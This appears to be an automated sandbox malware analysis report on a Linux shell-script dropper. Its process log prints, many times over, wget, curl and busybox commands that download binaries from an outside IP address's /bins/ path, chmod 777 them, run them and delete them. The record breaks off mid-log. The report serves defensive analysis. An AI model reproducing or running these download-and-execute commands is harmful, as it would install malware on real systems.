Malware Analysis Report

2025-05-06 03:39

Sample ID 241124-cjt26avkhk
Target 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
SHA256 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d

Threat Level: Shows suspicious behavior

The file 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 02:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 02:06

Reported

2024-11-24 02:09

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

46s

Max time network

129s

Command Line

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ N/A
N/A /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT N/A
N/A /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s N/A
N/A /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 N/A
N/A /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk N/A
N/A /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m N/A
N/A /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q N/A
N/A /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM N/A
N/A /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv N/A
N/A /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy N/A
N/A /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj N/A
N/A /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI N/A
N/A /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh N/A
N/A /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 N/A
N/A /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ N/A
N/A /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT N/A
N/A /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /usr/bin/curl N/A
File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /usr/bin/curl N/A
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A
File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A
File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /usr/bin/curl N/A
File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /usr/bin/curl N/A
File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /usr/bin/curl N/A
File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /usr/bin/curl N/A
File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /usr/bin/curl N/A
File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /usr/bin/curl N/A
File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /usr/bin/curl N/A
File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /usr/bin/curl N/A
File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /usr/bin/curl N/A
File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /usr/bin/curl N/A
File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /usr/bin/curl N/A
File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /usr/bin/curl N/A
File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /usr/bin/curl N/A

Processes

/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh

[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/chmod

[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/rm

[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/chmod

[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT

[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/rm

[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/wget

[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/chmod

[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s

[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/bin/rm

[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]

/usr/bin/wget

[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/chmod

[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4

[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/rm

[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/wget

[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/chmod

[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk

[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/rm

[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/wget

[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/chmod

[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m

[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/rm

[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/wget

[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/chmod

[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q

[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/rm

[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/wget

[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/chmod

[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM

[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/rm

[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/wget

[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/chmod

[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5

[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/rm

[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/chmod

[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv

[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/rm

[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/wget

[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/chmod

[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj

[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/rm

[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/wget

[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/chmod

[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI

[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/rm

[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/chmod

[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh

[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/rm

[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/wget

[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/chmod

[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy

[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/rm

[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/wget

[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/chmod

[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5

[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/bin/rm

[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]

/usr/bin/wget

[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/chmod

[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk

[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/bin/rm

[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]

/usr/bin/wget

[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/chmod

[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m

[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/bin/rm

[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]

/usr/bin/wget

[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/chmod

[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q

[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/bin/rm

[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]

/usr/bin/wget

[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/chmod

[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM

[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/bin/rm

[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]

/usr/bin/wget

[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/chmod

[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv

[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/bin/rm

[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]

/usr/bin/wget

[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/chmod

[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy

[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/bin/rm

[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]

/usr/bin/wget

[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/chmod

[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj

[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/bin/rm

[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]

/usr/bin/wget

[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/chmod

[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI

[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/bin/rm

[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/chmod

[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh

[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/bin/rm

[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]

/usr/bin/wget

[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/chmod

[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4

[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/bin/rm

[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]

/usr/bin/wget

[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/chmod

[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ

[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/bin/rm

[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]

/bin/chmod

